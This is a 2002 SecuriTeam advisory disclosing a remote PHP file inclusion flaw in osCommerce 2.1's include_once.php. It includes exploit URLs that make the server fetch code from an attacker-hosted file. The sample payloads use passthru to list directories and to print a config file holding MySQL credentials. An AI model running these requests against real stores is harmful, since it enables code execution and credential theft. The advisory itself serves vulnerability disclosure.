[UNIX] PHP Source Injection in osCommerce

From: support@securiteam.com
Date: 06/18/02


From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 18 Jun 2002 18:42:33 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  PHP Source Injection in osCommerce
------------------------------------------------------------------------

SUMMARY

 <http://www.oscommerce.com> osCommerce is an open source e-commerce
solution under on going development by the open source community. Its
feature packed out-of-the-box installation allows store owners to setup,
run, and maintain their online stores with minimum effort and with no
costs involved. A security vulnerability in the product allows attackers
to cause the program to include 3rd-party PHP code into its existing code
base, thus cause the arbitrary execution of malicious code.

DETAILS

Vulnerable systems:
 * osCommerce Preview Release 2.1

osCommerce commes with a file called /catalog/includes/include_once.php
that looks like this:

-------- include_once.php --------
<?
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
include($include_file);
  }
?>
----------------------------------

If someone requests a URL like:
http://SERVER/catalog/inludes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE, he would be able to include any code he wants

This could be a serious problem because this user could query the SQL
server and get acccess to other important files...

Examples:
1) Directory listing
http://SERVER/catalog/inludes/include_once.php?include_file=http://MYBOX/a.php

--- a.php ---
<? passthru("/bin/ls")?>
-------------

Would result in a directory listing of the current dierctory

2) File viewing
http://SERVER/catalog/inludes/include_once.php?include_file=http://MYBOX/b.php

--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------

Would result in showing of the application_top.php file (The file includes
MySQL username, password, etc).

Vendor response:
The vendor has been informed and is currently working on a fix.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:Tim.Vandermeersch@pandora.be> Tim Vandermeerch.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [UNIX] Apache Jakarta Tomcat 3 URL Parsing Vulnerability
    ... Beyond Security would like to welcome Tiscali World Online ... Tomcat is a JSP/Servlet implementation developed at the Apache Software ... vulnerabilities that allow a remote user to retrieve listings of ... the directory listing even if there's an index file present. ...
    (Securiteam)
  • [UNIX] Daydream BBS Format String Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... product allows attackers to exploit a format string vulnerability in the ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NEWS] L-Forum SQL Injection Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... arbitrary SQL commands by injecting them through user provided data. ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] Buffer Overrun in Talentsofts Web+
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... system service, any arbitrary code executed on the server would run in the ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [REVS] SQL Injection Whitepaper Released
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SQL injection is a technique for exploiting web applications that use ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)